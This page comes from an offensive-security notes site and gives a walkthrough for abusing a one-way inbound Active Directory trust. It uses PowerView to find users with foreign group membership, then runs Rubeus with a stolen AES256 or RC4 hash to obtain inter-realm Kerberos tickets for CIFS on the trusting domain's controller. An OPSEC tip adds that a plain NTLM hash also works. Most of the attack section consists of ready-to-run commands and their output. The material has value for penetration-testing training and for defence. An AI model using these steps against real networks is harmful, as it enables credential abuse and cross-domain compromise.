🦦
Otter's Notes
  • Introduction
  • Articles
    • Dumping data from the Microsoft Recall folder
    • Gaining persistence on Windows with Time Providers
    • Reverse engineering LSASS to decrypt DPAPI keys
    • Intro to Hypervisor Implants
    • In-depth Windows Telemetry
  • Notes
    • Active Directory
      • Active Directory Structure
      • Active Directory Terminology
      • Active Directory Objects
      • Active Directory Groups
      • Active Directory Functionality
      • Active Directory Protocols
      • Active Directory Rights and Privileges
      • Security in Active Directory
      • Users and Machine Accounts
      • NTLM
      • LDAP
      • Making a Target User List
      • Enumerating & Retrieving Password Policies
      • Enumerating Security Controls
      • Examining Group Policy
      • GPOs
      • LAPS
      • LLMNR & NBT-NS Poisoning
      • LOLBIN Enumeration
    • AAD
      • Useful Links
      • Overview of Azure & M365
      • Enumerate Users and Domains
      • Post-exploitation Reconnaissance
      • OAuth 2.0 Abuse
      • Abusing Device Code Authentication
      • Abusing Cloud Administrator Role
      • Abusing User Administrator Role
      • AAD Federated Backdoor
      • Service Principal Abuse
      • Compromising Azure Blobs and Storage Accounts
      • Malicious Device Join
      • Disabling Auditing (Unified Audit Logs)
      • Spoofing Azure Sign-In Logs
      • Registering Fake Agents for Log Spoofing
      • Pass the PRT
      • Pass the Cookie
      • Abusing Managed Identities
      • Virtual Machine Abuse
      • Attacking Key Vaults
    • Forest Trust Abuse
      • Parent-Child Trust Abuse
      • One-Way Inbound Trust Abuse
      • Foreign Group Membership
      • Foreign ACL Principals
      • SID History
      • SID Filter Bypass
      • Intra-Forest Attacks
        • Configuration Naming Context Replication
        • ADCS NC Replication Attack
        • GPO On-Site Attack
        • GoldenGMSA Attack
        • DNS Trust Attack
      • Cross-Forest Attacks
        • Trust Account Attack
        • Abusing SQL Linked Servers
        • Abusing PAM Trusts
    • Kerberos
      • Overview of Kerberos Authentication
      • Silver Tickets
      • Golden Tickets
      • Diamond Tickets
      • Kerberoasting
      • AS-REPRoasting
      • Resource-Based Constrained Delegation
      • Constrained Delegation
      • Unconstrained Delegation
      • S4U2Self & S4U2Proxy
      • Golden Certificates
    • DACL Abuse
      • DACL Overview
      • DACLs Enumeration
      • AddMembers
      • GPO Attacks
      • Granting Rights and Ownership
      • Logon Scripts
      • NoPAC
      • Password Abuse
      • SPN Jacking
      • Shadow Credentials
      • Targeted Kerberoasting
    • ADCS
      • Introduction to ADCS
      • ESC1
      • ESC2
      • ESC3
      • ESC4
      • ESC5
      • ESC6
      • ESC7
      • ESC8
      • ESC9
      • ESC10
      • ESC11
      • Certificate Mapping
    • PowerShell
      • PowerShell Basics
      • PowerShell Remoting
      • Alternate PowerShell Hosts
      • PowerShell Pipeline Runners
      • PowerShell Code Signing
      • Scriptblock Logging
      • PowerShell CLM
      • AMSI
      • PowerShell Reflection
      • WMI - Windows Management Instrumentation
      • Interfacing with AD
      • PowerShell Snippets
        • Bypass application whitelisting and CLM with runscripthelper and WMI
        • Create fake PowerShell logs
        • Enumerate AD ACLs
        • Enumerate WMI events
        • Enumerate Domain Trusts
        • Enumerate change metadata
        • Enumerate non-signed service binaries
        • Enumerate with GPOs
        • Find signed alternate PowerShell hosts
        • Get AMSI module
        • Group processes by user with WMI
        • Hide processes from Get-Process
        • Malware re-purposing with PowerShell reflection
        • Monitor PowerShell hosts with WMI
        • PowerShell reflection offensive use-case
        • Query PowerShell alternative hosts with WMI
        • Retrieve file certificate
        • Search LDAP for misconfigurations
        • Sign custom code with PowerShell
        • WMI service creation
        • Weak folder permission enumeration
    • AWS
      • AWS Organizations
      • AWS Principals
    • Binary Exploitation
      • Environment setup for Browser Exploitation
      • Browser Overview and Components
    • Kernel Development
      • Windows
        • Configuring a VM for driver development
Powered by GitBook
On this page
  1. Notes
  2. Forest Trust Abuse

One-Way Inbound Trust Abuse

A one-way inbound trusts looks like this

PS C:\users\otter\desktop> Get-DomainTrust

SourceName      : trusteddomain.com
TargetName      : trustingdomain.com
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : 
TrustDirection  : Inbound
WhenCreated     : 8/16/2022 9:52:37 AM
WhenChanged     : 8/16/2022 9:52:37 AM

To abuse this kind of trust we'll make use of the users or groups with Foreign Domain Group Membership (FDGM): users or groups from the first domain that are also trusted in the second one. With valid domain credentials for these users we can access, scan and interact with the trusting domain.

To find users and groups with FDGM

PS C:\users\otter\desktop> Get-DomainForeignGroupMember -Domain trustingdomain.com

GroupDomain             : trustingdomain.com
GroupName               : Administrators
GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=trustingdomain,DC=com
MemberDomain            : trustingdomain.com
MemberName              : S-1-5-21-569305411-121244042-2357301523-1120

for example, this output shows that there is a member of the Administrators groups in the trusted domain that is not part of the domain directly, to check what user or group has this property we can convert the shown SID and we'll find that this group is in the trusted domain

PS C:\users\otter\desktop> ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1120

TRUSTED\Worskstation Admins
PS C:\users\otter\desktop> Get-DomainGroupMember -Identity "Workstation Admins" | select MemberName

MemberName
----------
otter

Another way to get this information is using BloodHound with the Groups with Foreign Domain Group Membership and Users with Foreign Domain Group Membership queries.

To (ab)use this trust we need the RC4 or AES256_HMAC hash for the user with FDGM to ask a inter-realm TGT and TGS

PS C:\users\otter\desktop> Rubeus.exe asktgt /user:otter /domain:trusteddomain.com /aes256:<AES256_HMAC_HASH> /nowrap

PS C:\users\otter\desktop> Rubeus.exe asktgs /service:krbtgt/trustingdomain.com /domain:trusteddomain.com /dc:dc.trusteddomain.com /ticket:<BASE64_KIRBI_TICKET> /nowrap

Now we can request the inter-realm ticket

PS C:\users\otter\desktop> Rubeus.exe asktgs /service:cifs/dc.trustingdomain.com /domain:trustingdomain.com /dc:dc.trustringdomain.com /ticket:<BASE64_KIRBI_TICKET> /nowrap

OPSEC

It's good to highlight that, when we request the TGS for the trusted domain, we are shown the KeyType of the ticket

PS C:\users\otter\desktop> Rubeus.exe asktgs /service:krbtgt/trustingdomain.com /domain:trusteddomain.com /dc:dc.trusteddomain.com /ticket:<BASE64_KIRBI_TICKET> /nowrap
...

KeyType                  :  rc4_hmac

...

RC4 is the default key type so using a normal NTLM hash is also a viable option.

PreviousParent-Child Trust AbuseNextForeign Group Membership

Last updated 1 year ago